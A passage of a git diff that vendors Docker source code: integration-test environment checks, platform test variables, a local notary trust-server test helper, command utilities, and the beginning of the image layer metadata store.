+			cmd := exec.Command("test", "-f", "/proc/net/if_inet6")
+
+			if err := cmd.Run(); err != nil {
+				return true
+			}
+			return false
+		},
+		"Test requires support for IPv6",
+	}
+	UserNamespaceROMount = testRequirement{
+		func() bool {
+			// quick case--userns not enabled in this test run
+			if os.Getenv("DOCKER_REMAP_ROOT") == "" {
+				return true
+			}
+			if _, _, err := dockerCmdWithError("run", "--rm", "--read-only", "busybox", "date"); err != nil {
+				return false
+			}
+			return true
+		},
+		"Test cannot be run if user namespaces enabled but readonly mounts fail on this kernel.",
+	}
+	UserNamespaceInKernel = testRequirement{
+		func() bool {
+			if _, err := os.Stat("/proc/self/uid_map"); os.IsNotExist(err) {
+				/*
+				 * This kernel-provided file only exists if user namespaces are
+				 * supported
+				 */
+				return false
+			}
+
+			// We need extra check on redhat based distributions
+			if f, err := os.Open("/sys/module/user_namespace/parameters/enable"); err == nil {
+				defer f.Close()
+				b := make([]byte, 1)
+				_, _ = f.Read(b)
+				if string(b) == "N" {
+					return false
+				}
+				return true
+			}
+
+			return true
+		},
+		"Kernel must have user namespaces configured and enabled.",
+	}
+	NotUserNamespace = testRequirement{
+		func() bool {
+			root := os.Getenv("DOCKER_REMAP_ROOT")
+			if root != "" {
+				return false
+			}
+			return true
+		},
+		"Test cannot be run when remapping root",
+	}
+	IsPausable = testRequirement{
+		func() bool {
+			if daemonPlatform == "windows" {
+				return isolation == "hyperv"
+			}
+			return true
+		},
+		"Test requires containers are pausable.",
+	}
+	NotPausable = testRequirement{
+		func() bool {
+			if daemonPlatform == "windows" {
+				return isolation == "process"
+			}
+			return false
+		},
+		"Test requires containers are not pausable.",
+	}
+	IsolationIsHyperv = testRequirement{
+		func() bool {
+			return daemonPlatform == "windows" && isolation == "hyperv"
+		},
+		"Test requires a Windows daemon running default isolation mode of hyperv.",
+	}
+	IsolationIsProcess = testRequirement{
+		func() bool {
+			return daemonPlatform == "windows" && isolation == "process"
+		},
+		"Test requires a Windows daemon running default isolation mode of process.",
+	}
+)
+
+// testRequires checks if the environment satisfies the requirements
+// for the test to run or skips the tests.
+func testRequires(c *check.C, requirements ...testRequirement) {
+	for _, r := range requirements {
+		if !r.Condition() {
+			c.Skip(r.SkipMessage)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/requirements_unix.go b/vendor/github.com/docker/docker/integration-cli/requirements_unix.go
new file mode 100644
index 0000000000..ef017d8a76
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/requirements_unix.go
@@ -0,0 +1,159 @@
+// +build !windows
+
+package main
+
+import (
+	"bytes"
+	"io/ioutil"
+	"os/exec"
+	"strings"
+
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/docker/docker/pkg/sysinfo"
+)
+
+var (
+	// SysInfo stores information about which features a kernel supports.
+	SysInfo      *sysinfo.SysInfo
+	cpuCfsPeriod = testRequirement{
+		func() bool {
+			return SysInfo.CPUCfsPeriod
+		},
+		"Test requires an environment that supports cgroup cfs period.",
+	}
+	cpuCfsQuota = testRequirement{
+		func() bool {
+			return SysInfo.CPUCfsQuota
+		},
+		"Test requires an environment that supports cgroup cfs quota.",
+	}
+	cpuShare = testRequirement{
+		func() bool {
+			return SysInfo.CPUShares
+		},
+		"Test requires an environment that supports cgroup cpu shares.",
+	}
+	oomControl = testRequirement{
+		func() bool {
+			return SysInfo.OomKillDisable
+		},
+		"Test requires Oom control enabled.",
+	}
+	pidsLimit = testRequirement{
+		func() bool {
+			return SysInfo.PidsLimit
+		},
+		"Test requires pids limit enabled.",
+	}
+	kernelMemorySupport = testRequirement{
+		func() bool {
+			return SysInfo.KernelMemory
+		},
+		"Test requires an environment that supports cgroup kernel memory.",
+	}
+	memoryLimitSupport = testRequirement{
+		func() bool {
+			return SysInfo.MemoryLimit
+		},
+		"Test requires an environment that supports cgroup memory limit.",
+	}
+	memoryReservationSupport = testRequirement{
+		func() bool {
+			return SysInfo.MemoryReservation
+		},
+		"Test requires an environment that supports cgroup memory reservation.",
+	}
+	swapMemorySupport = testRequirement{
+		func() bool {
+			return SysInfo.SwapLimit
+		},
+		"Test requires an environment that supports cgroup swap memory limit.",
+	}
+	memorySwappinessSupport = testRequirement{
+		func() bool {
+			return SysInfo.MemorySwappiness
+		},
+		"Test requires an environment that supports cgroup memory swappiness.",
+	}
+	blkioWeight = testRequirement{
+		func() bool {
+			return SysInfo.BlkioWeight
+		},
+		"Test requires an environment that supports blkio weight.",
+	}
+	cgroupCpuset = testRequirement{
+		func() bool {
+			return SysInfo.Cpuset
+		},
+		"Test requires an environment that supports cgroup cpuset.",
+	}
+	seccompEnabled = testRequirement{
+		func() bool {
+			return supportsSeccomp && SysInfo.Seccomp
+		},
+		"Test requires that seccomp support be enabled in the daemon.",
+	}
+	bridgeNfIptables = testRequirement{
+		func() bool {
+			return !SysInfo.BridgeNFCallIPTablesDisabled
+		},
+		"Test requires that bridge-nf-call-iptables support be enabled in the daemon.",
+	}
+	bridgeNfIP6tables = testRequirement{
+		func() bool {
+			return !SysInfo.BridgeNFCallIP6TablesDisabled
+		},
+		"Test requires that bridge-nf-call-ip6tables support be enabled in the daemon.",
+	}
+	unprivilegedUsernsClone = testRequirement{
+		func() bool {
+			content, err := ioutil.ReadFile("/proc/sys/kernel/unprivileged_userns_clone")
+			if err == nil && strings.Contains(string(content), "0") {
+				return false
+			}
+			return true
+		},
+		"Test cannot be run with 'sysctl kernel.unprivileged_userns_clone' = 0",
+	}
+	ambientCapabilities = testRequirement{
+		func() bool {
+			content, err := ioutil.ReadFile("/proc/self/status")
+			if err == nil && strings.Contains(string(content), "CapAmb:") {
+				return true
+			}
+			return false
+		},
+		"Test cannot be run without a kernel (4.3+) supporting ambient capabilities",
+	}
+	overlayFSSupported = testRequirement{
+		func() bool {
+			cmd := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "cat /proc/filesystems")
+			out, err := cmd.CombinedOutput()
+			if err != nil {
+				return false
+			}
+			return bytes.Contains(out, []byte("overlay\n"))
+		},
+		"Test cannot be run without suppport for overlayfs",
+	}
+	overlay2Supported = testRequirement{
+		func() bool {
+			if !overlayFSSupported.Condition() {
+				return false
+			}
+
+			daemonV, err := kernel.ParseRelease(daemonKernelVersion)
+			if err != nil {
+				return false
+			}
+			requiredV := kernel.VersionInfo{Kernel: 4}
+			return kernel.CompareKernelVersion(*daemonV, requiredV) > -1
+
+		},
+		"Test cannot be run without overlay2 support (kernel 4.0+)",
+	}
+)
+
+func init() {
+	SysInfo = sysinfo.New(true)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars.go b/vendor/github.com/docker/docker/integration-cli/test_vars.go
new file mode 100644
index 0000000000..97bcddd5f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/test_vars.go
@@ -0,0 +1,11 @@
+package main
+
+// sleepCommandForDaemonPlatform is a helper function that determines what
+// the command is for a sleeping container based on the daemon platform.
+// The Windows busybox image does not have a `top` command.
+func sleepCommandForDaemonPlatform() []string {
+	if daemonPlatform == "windows" {
+		return []string{"sleep", "240"}
+	}
+	return []string{"top"}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go
new file mode 100644
index 0000000000..7633b346ba
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/test_vars_exec.go
@@ -0,0 +1,8 @@
+// +build !test_no_exec
+
+package main
+
+const (
+	// indicates docker daemon tested supports 'docker exec'
+	supportsExec = true
+)
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go
new file mode 100644
index 0000000000..0845090524
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/test_vars_noexec.go
@@ -0,0 +1,8 @@
+// +build test_no_exec
+
+package main
+
+const (
+	// indicates docker daemon tested supports 'docker exec'
+	supportsExec = false
+)
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go
new file mode 100644
index 0000000000..2f47ab07a0
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/test_vars_noseccomp.go
@@ -0,0 +1,8 @@
+// +build !seccomp
+
+package main
+
+const (
+	// indicates docker daemon built with seccomp support
+	supportsSeccomp = false
+)
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go b/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go
new file mode 100644
index 0000000000..00cf697209
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/test_vars_seccomp.go
@@ -0,0 +1,8 @@
+// +build seccomp
+
+package main
+
+const (
+	// indicates docker daemon built with seccomp support
+	supportsSeccomp = true
+)
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go b/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go
new file mode 100644
index 0000000000..f9ecc01123
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/test_vars_unix.go
@@ -0,0 +1,14 @@
+// +build !windows
+
+package main
+
+const (
+	// identifies if test suite is running on a unix platform
+	isUnixCli = true
+
+	expectedFileChmod = "-rw-r--r--"
+
+	// On Unix variants, the busybox image comes with the `top` command which
+	// runs indefinitely while still being interruptible by a signal.
+	defaultSleepImage = "busybox"
+)
diff --git a/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go b/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go
new file mode 100644
index 0000000000..bfc9a5a915
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/test_vars_windows.go
@@ -0,0 +1,15 @@
+// +build windows
+
+package main
+
+const (
+	// identifies if test suite is running on a unix platform
+	isUnixCli = false
+
+	// this is the expected file permission set on windows: gh#11395
+	expectedFileChmod = "-rwxr-xr-x"
+
+	// On Windows, the busybox image doesn't have the `top` command, so we rely
+	// on `sleep` with a high duration.
+	defaultSleepImage = "busybox"
+)
diff --git a/vendor/github.com/docker/docker/integration-cli/trust_server.go b/vendor/github.com/docker/docker/integration-cli/trust_server.go
new file mode 100644
index 0000000000..18876311a1
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/trust_server.go
@@ -0,0 +1,344 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/go-check/check"
+)
+
+var notaryBinary = "notary"
+var notaryServerBinary = "notary-server"
+
+type keyPair struct {
+	Public  string
+	Private string
+}
+
+type testNotary struct {
+	cmd  *exec.Cmd
+	dir  string
+	keys []keyPair
+}
+
+const notaryHost = "localhost:4443"
+const notaryURL = "https://" + notaryHost
+
+func newTestNotary(c *check.C) (*testNotary, error) {
+	// generate server config
+	template := `{
+	"server": {
+		"http_addr": "%s",
+		"tls_key_file": "%s",
+		"tls_cert_file": "%s"
+	},
+	"trust_service": {
+		"type": "local",
+		"hostname": "",
+		"port": "",
+		"key_algorithm": "ed25519"
+	},
+	"logging": {
+		"level": "debug"
+	},
+	"storage": {
+        "backend": "memory"
+    }
+}`
+	tmp, err := ioutil.TempDir("", "notary-test-")
+	if err != nil {
+		return nil, err
+	}
+	confPath := filepath.Join(tmp, "config.json")
+	config, err := os.Create(confPath)
+	if err != nil {
+		return nil, err
+	}
+	defer config.Close()
+
+	workingDir, err := os.Getwd()
+	if err != nil {
+		return nil, err
+	}
+	if _, err := fmt.Fprintf(config, template, notaryHost, filepath.Join(workingDir, "fixtures/notary/localhost.key"), filepath.Join(workingDir, "fixtures/notary/localhost.cert")); err != nil {
+		os.RemoveAll(tmp)
+		return nil, err
+	}
+
+	// generate client config
+	clientConfPath := filepath.Join(tmp, "client-config.json")
+	clientConfig, err := os.Create(clientConfPath)
+	if err != nil {
+		return nil, err
+	}
+	defer clientConfig.Close()
+
+	template = `{
+	"trust_dir" : "%s",
+	"remote_server": {
+		"url": "%s",
+		"skipTLSVerify": true
+	}
+}`
+	if _, err = fmt.Fprintf(clientConfig, template, filepath.Join(cliconfig.ConfigDir(), "trust"), notaryURL); err != nil {
+		os.RemoveAll(tmp)
+		return nil, err
+	}
+
+	// load key fixture filenames
+	var keys []keyPair
+	for i := 1; i < 5; i++ {
+		keys = append(keys, keyPair{
+			Public:  filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.crt", i)),
+			Private: filepath.Join(workingDir, fmt.Sprintf("fixtures/notary/delgkey%v.key", i)),
+		})
+	}
+
+	// run notary-server
+	cmd := exec.Command(notaryServerBinary, "-config", confPath)
+	if err := cmd.Start(); err != nil {
+		os.RemoveAll(tmp)
+		if os.IsNotExist(err) {
+			c.Skip(err.Error())
+		}
+		return nil, err
+	}
+
+	testNotary := &testNotary{
+		cmd:  cmd,
+		dir:  tmp,
+		keys: keys,
+	}
+
+	// Wait for notary to be ready to serve requests.
+	for i := 1; i <= 20; i++ {
+		if err = testNotary.Ping(); err == nil {
+			break
+		}
+		time.Sleep(10 * time.Millisecond * time.Duration(i*i))
+	}
+
+	if err != nil {
+		c.Fatalf("Timeout waiting for test notary to become available: %s", err)
+	}
+
+	return testNotary, nil
+}
+
+func (t *testNotary) Ping() error {
+	tlsConfig := tlsconfig.ClientDefault()
+	tlsConfig.InsecureSkipVerify = true
+	client := http.Client{
+		Transport: &http.Transport{
+			Proxy: http.ProxyFromEnvironment,
+			Dial: (&net.Dialer{
+				Timeout:   30 * time.Second,
+				KeepAlive: 30 * time.Second,
+			}).Dial,
+			TLSHandshakeTimeout: 10 * time.Second,
+			TLSClientConfig:     tlsConfig,
+		},
+	}
+	resp, err := client.Get(fmt.Sprintf("%s/v2/", notaryURL))
+	if err != nil {
+		return err
+	}
+	if resp.StatusCode != http.StatusOK {
+		return fmt.Errorf("notary ping replied with an unexpected status code %d", resp.StatusCode)
+	}
+	return nil
+}
+
+func (t *testNotary) Close() {
+	t.cmd.Process.Kill()
+	os.RemoveAll(t.dir)
+}
+
+func (s *DockerTrustSuite) trustedCmd(cmd *exec.Cmd) {
+	pwd := "12345678"
+	trustCmdEnv(cmd, notaryURL, pwd, pwd)
+}
+
+func (s *DockerTrustSuite) trustedCmdWithServer(cmd *exec.Cmd, server string) {
+	pwd := "12345678"
+	trustCmdEnv(cmd, server, pwd, pwd)
+}
+
+func (s *DockerTrustSuite) trustedCmdWithPassphrases(cmd *exec.Cmd, rootPwd, repositoryPwd string) {
+	trustCmdEnv(cmd, notaryURL, rootPwd, repositoryPwd)
+}
+
+func trustCmdEnv(cmd *exec.Cmd, server, rootPwd, repositoryPwd string) {
+	env := []string{
+		"DOCKER_CONTENT_TRUST=1",
+		fmt.Sprintf("DOCKER_CONTENT_TRUST_SERVER=%s", server),
+		fmt.Sprintf("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE=%s", rootPwd),
+		fmt.Sprintf("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE=%s", repositoryPwd),
+	}
+	cmd.Env = append(os.Environ(), env...)
+}
+
+func (s *DockerTrustSuite) setupTrustedImage(c *check.C, name string) string {
+	repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+
+	if err != nil {
+		c.Fatalf("Error running trusted push: %s\n%s", err, out)
+	}
+	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
+		c.Fatalf("Missing expected output on trusted push:\n%s", out)
+	}
+
+	if out, status := dockerCmd(c, "rmi", repoName); status != 0 {
+		c.Fatalf("Error removing image %q\n%s", repoName, out)
+	}
+
+	return repoName
+}
+
+func (s *DockerTrustSuite) setupTrustedplugin(c *check.C, source, name string) string {
+	repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, name)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "plugin", "install", "--grant-all-permissions", "--alias", repoName, source)
+
+	pushCmd := exec.Command(dockerBinary, "plugin", "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+
+	if err != nil {
+		c.Fatalf("Error running trusted plugin push: %s\n%s", err, out)
+	}
+	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
+		c.Fatalf("Missing expected output on trusted push:\n%s", out)
+	}
+
+	if out, status := dockerCmd(c, "plugin", "rm", "-f", repoName); status != 0 {
+		c.Fatalf("Error removing plugin %q\n%s", repoName, out)
+	}
+
+	return repoName
+}
+
+func notaryClientEnv(cmd *exec.Cmd) {
+	pwd := "12345678"
+	env := []string{
+		fmt.Sprintf("NOTARY_ROOT_PASSPHRASE=%s", pwd),
+		fmt.Sprintf("NOTARY_TARGETS_PASSPHRASE=%s", pwd),
+		fmt.Sprintf("NOTARY_SNAPSHOT_PASSPHRASE=%s", pwd),
+		fmt.Sprintf("NOTARY_DELEGATION_PASSPHRASE=%s", pwd),
+	}
+	cmd.Env = append(os.Environ(), env...)
+}
+
+func (s *DockerTrustSuite) notaryInitRepo(c *check.C, repoName string) {
+	initCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "init", repoName)
+	notaryClientEnv(initCmd)
+	out, _, err := runCommandWithOutput(initCmd)
+	if err != nil {
+		c.Fatalf("Error initializing notary repository: %s\n", out)
+	}
+}
+
+func (s *DockerTrustSuite) notaryCreateDelegation(c *check.C, repoName, role string, pubKey string, paths ...string) {
+	pathsArg := "--all-paths"
+	if len(paths) > 0 {
+		pathsArg = "--paths=" + strings.Join(paths, ",")
+	}
+
+	delgCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"),
+		"delegation", "add", repoName, role, pubKey, pathsArg)
+	notaryClientEnv(delgCmd)
+	out, _, err := runCommandWithOutput(delgCmd)
+	if err != nil {
+		c.Fatalf("Error adding %s role to notary repository: %s\n", role, out)
+	}
+}
+
+func (s *DockerTrustSuite) notaryPublish(c *check.C, repoName string) {
+	pubCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "publish", repoName)
+	notaryClientEnv(pubCmd)
+	out, _, err := runCommandWithOutput(pubCmd)
+	if err != nil {
+		c.Fatalf("Error publishing notary repository: %s\n", out)
+	}
+}
+
+func (s *DockerTrustSuite) notaryImportKey(c *check.C, repoName, role string, privKey string) {
+	impCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "key",
+		"import", privKey, "-g", repoName, "-r", role)
+	notaryClientEnv(impCmd)
+	out, _, err := runCommandWithOutput(impCmd)
+	if err != nil {
+		c.Fatalf("Error importing key to notary repository: %s\n", out)
+	}
+}
+
+func (s *DockerTrustSuite) notaryListTargetsInRole(c *check.C, repoName, role string) map[string]string {
+	listCmd := exec.Command(notaryBinary, "-c", filepath.Join(s.not.dir, "client-config.json"), "list",
+		repoName, "-r", role)
+	notaryClientEnv(listCmd)
+	out, _, err := runCommandWithOutput(listCmd)
+	if err != nil {
+		c.Fatalf("Error listing targets in notary repository: %s\n", out)
+	}
+
+	// should look something like:
+	//    NAME                                 DIGEST                                SIZE (BYTES)    ROLE
+	// ------------------------------------------------------------------------------------------------------
+	//   latest   24a36bbc059b1345b7e8be0df20f1b23caa3602e85d42fff7ecd9d0bd255de56   1377           targets
+
+	targets := make(map[string]string)
+
+	// no target
+	lines := strings.Split(strings.TrimSpace(out), "\n")
+	if len(lines) == 1 && strings.Contains(out, "No targets present in this repository.") {
+		return targets
+	}
+
+	// otherwise, there is at least one target
+	c.Assert(len(lines), checker.GreaterOrEqualThan, 3)
+
+	for _, line := range lines[2:] {
+		tokens := strings.Fields(line)
+		c.Assert(tokens, checker.HasLen, 4)
+		targets[tokens[0]] = tokens[3]
+	}
+
+	return targets
+}
+
+func (s *DockerTrustSuite) assertTargetInRoles(c *check.C, repoName, target string, roles ...string) {
+	// check all the roles
+	for _, role := range roles {
+		targets := s.notaryListTargetsInRole(c, repoName, role)
+		roleName, ok := targets[target]
+		c.Assert(ok, checker.True)
+		c.Assert(roleName, checker.Equals, role)
+	}
+}
+
+func (s *DockerTrustSuite) assertTargetNotInRoles(c *check.C, repoName, target string, roles ...string) {
+	targets := s.notaryListTargetsInRole(c, repoName, "targets")
+
+	roleName, ok := targets[target]
+	if ok {
+		for _, role := range roles {
+			c.Assert(roleName, checker.Not(checker.Equals), role)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/utils.go b/vendor/github.com/docker/docker/integration-cli/utils.go
new file mode 100644
index 0000000000..87d48e41b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/utils.go
@@ -0,0 +1,79 @@
+package main
+
+import (
+	"io"
+	"os"
+	"os/exec"
+	"time"
+
+	"github.com/docker/docker/pkg/integration"
+	"github.com/docker/docker/pkg/integration/cmd"
+)
+
+func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) {
+	if daemonPlatform == "windows" {
+		return "c:", `\`
+	}
+	return "", "/"
+}
+
+// TODO: update code to call cmd.RunCmd directly, and remove this function
+func runCommandWithOutput(execCmd *exec.Cmd) (string, int, error) {
+	result := cmd.RunCmd(transformCmd(execCmd))
+	return result.Combined(), result.ExitCode, result.Error
+}
+
+// TODO: update code to call cmd.RunCmd directly, and remove this function
+func runCommandWithStdoutStderr(execCmd *exec.Cmd) (string, string, int, error) {
+	result := cmd.RunCmd(transformCmd(execCmd))
+	return result.Stdout(), result.Stderr(), result.ExitCode, result.Error
+}
+
+// TODO: update code to call cmd.RunCmd directly, and remove this function
+func runCommand(execCmd *exec.Cmd) (exitCode int, err error) {
+	result := cmd.RunCmd(transformCmd(execCmd))
+	return result.ExitCode, result.Error
+}
+
+// Temporary shim for migrating commands to the new function
+func transformCmd(execCmd *exec.Cmd) cmd.Cmd {
+	return cmd.Cmd{
+		Command: execCmd.Args,
+		Env:     execCmd.Env,
+		Dir:     execCmd.Dir,
+		Stdin:   execCmd.Stdin,
+		Stdout:  execCmd.Stdout,
+	}
+}
+
+func runCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) {
+	return integration.RunCommandPipelineWithOutput(cmds...)
+}
+
+func convertSliceOfStringsToMap(input []string) map[string]struct{} {
+	return integration.ConvertSliceOfStringsToMap(input)
+}
+
+func compareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error {
+	return integration.CompareDirectoryEntries(e1, e2)
+}
+
+func listTar(f io.Reader) ([]string, error) {
+	return integration.ListTar(f)
+}
+
+func randomTmpDirPath(s string, platform string) string {
+	return integration.RandomTmpDirPath(s, platform)
+}
+
+func consumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) {
+	return integration.ConsumeWithSpeed(reader, chunkSize, interval, stop)
+}
+
+func parseCgroupPaths(procCgroupData string) map[string]string {
+	return integration.ParseCgroupPaths(procCgroupData)
+}
+
+func runAtDifferentDate(date time.Time, block func()) {
+	integration.RunAtDifferentDate(date, block)
+}
diff --git a/vendor/github.com/docker/docker/layer/empty.go b/vendor/github.com/docker/docker/layer/empty.go
new file mode 100644
index 0000000000..3b6ffc82f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/empty.go
@@ -0,0 +1,56 @@
+package layer
+
+import (
+	"archive/tar"
+	"bytes"
+	"fmt"
+	"io"
+	"io/ioutil"
+)
+
+// DigestSHA256EmptyTar is the canonical sha256 digest of empty tar file -
+// (1024 NULL bytes)
+const DigestSHA256EmptyTar = DiffID("sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef")
+
+type emptyLayer struct{}
+
+// EmptyLayer is a layer that corresponds to empty tar.
+var EmptyLayer = &emptyLayer{}
+
+func (el *emptyLayer) TarStream() (io.ReadCloser, error) {
+	buf := new(bytes.Buffer)
+	tarWriter := tar.NewWriter(buf)
+	tarWriter.Close()
+	return ioutil.NopCloser(buf), nil
+}
+
+func (el *emptyLayer) TarStreamFrom(p ChainID) (io.ReadCloser, error) {
+	if p == "" {
+		return el.TarStream()
+	}
+	return nil, fmt.Errorf("can't get parent tar stream of an empty layer")
+}
+
+func (el *emptyLayer) ChainID() ChainID {
+	return ChainID(DigestSHA256EmptyTar)
+}
+
+func (el *emptyLayer) DiffID() DiffID {
+	return DigestSHA256EmptyTar
+}
+
+func (el *emptyLayer) Parent() Layer {
+	return nil
+}
+
+func (el *emptyLayer) Size() (size int64, err error) {
+	return 0, nil
+}
+
+func (el *emptyLayer) DiffSize() (size int64, err error) {
+	return 0, nil
+}
+
+func (el *emptyLayer) Metadata() (map[string]string, error) {
+	return make(map[string]string), nil
+}
diff --git a/vendor/github.com/docker/docker/layer/empty_test.go b/vendor/github.com/docker/docker/layer/empty_test.go
new file mode 100644
index 0000000000..c22da7665d
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/empty_test.go
@@ -0,0 +1,46 @@
+package layer
+
+import (
+	"io"
+	"testing"
+
+	"github.com/docker/distribution/digest"
+)
+
+func TestEmptyLayer(t *testing.T) {
+	if EmptyLayer.ChainID() != ChainID(DigestSHA256EmptyTar) {
+		t.Fatal("wrong ID for empty layer")
+	}
+
+	if EmptyLayer.DiffID() != DigestSHA256EmptyTar {
+		t.Fatal("wrong DiffID for empty layer")
+	}
+
+	if EmptyLayer.Parent() != nil {
+		t.Fatal("expected no parent for empty layer")
+	}
+
+	if size, err := EmptyLayer.Size(); err != nil || size != 0 {
+		t.Fatal("expected zero size for empty layer")
+	}
+
+	if diffSize, err := EmptyLayer.DiffSize(); err != nil || diffSize != 0 {
+		t.Fatal("expected zero diffsize for empty layer")
+	}
+
+	tarStream, err := EmptyLayer.TarStream()
+	if err != nil {
+		t.Fatalf("error streaming tar for empty layer: %v", err)
+	}
+
+	digester := digest.Canonical.New()
+	_, err = io.Copy(digester.Hash(), tarStream)
+
+	if err != nil {
+		t.Fatalf("error hashing empty tar layer: %v", err)
+	}
+
+	if digester.Digest() != digest.Digest(DigestSHA256EmptyTar) {
+		t.Fatal("empty layer tar stream hashes to wrong value")
+	}
+}
diff --git a/vendor/github.com/docker/docker/layer/filestore.go b/vendor/github.com/docker/docker/layer/filestore.go
new file mode 100644
index 0000000000..42b45556e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/filestore.go
@@ -0,0 +1,354 @@
+package layer
+
+import (
+	"compress/gzip"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"regexp"
+	"strconv"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/pkg/ioutils"
+)
+
+var (
+	stringIDRegexp      = regexp.MustCompile(`^[a-f0-9]{64}(-init)?$`)
+	supportedAlgorithms = []digest.Algorithm{
+		digest.SHA256,
+		// digest.SHA384, // Currently not used
+		// digest.SHA512, // Currently not used
+	}
+)
+
+type fileMetadataStore struct {
+	root string
+}
+
+type fileMetadataTransaction struct {
+	store *fileMetadataStore
+	ws    *ioutils.AtomicWriteSet
+}
+
+// NewFSMetadataStore returns an instance of a metadata store
+// which is backed by files on disk using the provided root
+// as the root of metadata files.
+func NewFSMetadataStore(root string) (MetadataStore, error) {
+	if err := os.MkdirAll(root, 0700); err != nil {
+		return nil, err
+	}
+	return &fileMetadataStore{
+		root: root,
+	}, nil
+}
+
+func (fms *fileMetadataStore) getLayerDirectory(layer ChainID) string {
+	dgst := digest.Digest(layer)
+	return filepath.Join(fms.root, string(dgst.Algorithm()), dgst.Hex())
+}
+
+func (fms *fileMetadataStore) getLayerFilename(layer ChainID, filename string) string {
+	return filepath.Join(fms.getLayerDirectory(layer), filename)
+}
+
+func (fms *fileMetadataStore) getMountDirectory(mount string) string {
+	return filepath.Join(fms.root, "mounts", mount)
+}
+
+func (fms *fileMetadataStore) getMountFilename(mount, filename string) string {
+	return filepath.Join(fms.getMountDirectory(mount), filename)
+}
+
+func (fms *fileMetadataStore) StartTransaction() (MetadataTransaction, error) {
+	tmpDir := filepath.Join(fms.root, "tmp")
+	if err := os.MkdirAll(tmpDir, 0755); err != nil {
+		return nil, err
+	}
+	ws, err := ioutils.NewAtomicWriteSet(tmpDir)
+	if err != nil {
+		return nil, err
+	}
+
+	return &fileMetadataTransaction{
+		store: fms,
+		ws:    ws,
+	}, nil
+}
+
+func (fm *fileMetadataTransaction) SetSize(size int64) error {
+	content := fmt.Sprintf("%d", size)
+	return fm.ws.WriteFile("size", []byte(content), 0644)
+}
+
+func (fm *fileMetadataTransaction) SetParent(parent ChainID) error {
+	return fm.ws.WriteFile("parent", []byte(digest.Digest(parent).String()), 0644)
+}
+
+func (fm *fileMetadataTransaction) SetDiffID(diff DiffID) error {
+	return fm.ws.WriteFile("diff", []byte(digest.Digest(diff).String()), 0644)
+}
+
+func (fm *fileMetadataTransaction) SetCacheID(cacheID string) error {
+	return fm.ws.WriteFile("cache-id", []byte(cacheID), 0644)
+}
+
+func (fm *fileMetadataTransaction) SetDescriptor(ref distribution.Descriptor) error {
+	jsonRef, err := json.Marshal(ref)
+	if err != nil {
+		return err
+	}
+	return fm.ws.WriteFile("descriptor.json", jsonRef, 0644)
+}
+
+func (fm *fileMetadataTransaction) TarSplitWriter(compressInput bool) (io.WriteCloser, error) {
+	f, err := fm.ws.FileWriter("tar-split.json.gz", os.O_TRUNC|os.O_CREATE|os.O_WRONLY, 0644)
+	if err != nil {
